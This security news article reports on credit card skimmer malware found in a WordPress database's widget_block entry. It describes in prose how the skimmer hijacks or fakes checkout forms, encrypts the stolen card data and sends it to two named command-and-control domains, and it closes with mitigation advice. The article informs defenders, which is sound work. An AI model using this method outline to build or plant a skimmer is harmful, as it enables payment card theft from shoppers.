During an investigation of a compromised WordPress website, sophisticated credit card skimmer malware was discovered that stealthily injects malicious JavaScript into database entries, specifically targeting checkout pages.
The malicious script either hijacks existing payment fields or injects a fraudulent credit card form, enabling the theft of sensitive payment information from unsuspecting customers.
This stealthy operation makes it possible for the malware to remain undetected while simultaneously compromising the integrity of the website and putting the financial data of customers at risk.
The malware was discovered within the WordPress database, specifically within the `wp_options` table under the `widget_block` row that contained obfuscated JavaScript code.
By targeting the database, the malware evades detection by typical file-scanning methods, allowing it to persist undetected on compromised WordPress sites. The malicious JavaScript was injected into the HTML block widget through the WordPress admin panel, enabling its execution within the website’s frontend.
It injects a fake payment form or hijacks existing payment fields on the checkout page to steal credit card information, including credit card number, expiration date, CVV, and billing information.
The malware takes sensitive information from the device of the victim, and in order to conceal the information, it first uses Base64 encoding of the information.
Subsequently, the encoded data is encrypted using AES-CBC, a robust encryption algorithm, with a randomly generated initialization vector (IV) that makes the data appear innocuous during transmission and hinders analysis.
The encrypted data is then exfiltrated to remote command-and-control (C2) servers, such as “valhafather[.]xyz” and “fqbe23[.]xyz,” using the navigator.sendBeacon function that ensures silent data transmission without disrupting the user experience.
According to Sucuri, this malware poses a significant threat by covertly exfiltrating sensitive payment data, such as credit card details, from unsuspecting online shoppers during checkout.
The malicious code, often concealed within inconspicuous Custom HTML widgets, operates discreetly in the background, intercepting and transmitting this critical information to threat actors.
Cybercriminals then exploit this stolen data for fraudulent transactions or monetize it by selling it on illicit underground markets, which makes it particularly dangerous, as it can compromise customer data without any noticeable disruption to the normal checkout process.
The credit card skimmer attack highlights the evolving threat landscape, where attackers exploit WordPress databases to inject malicious code into checkout processes. By leveraging outdated software and weak admin controls, attackers can silently steal payment data.
Mitigating these risks requires proactive measures such as regular software updates, robust password security, and the implementation of file integrity monitoring and web application firewalls that can enhance security posture by proactively identifying and preventing malicious activities.
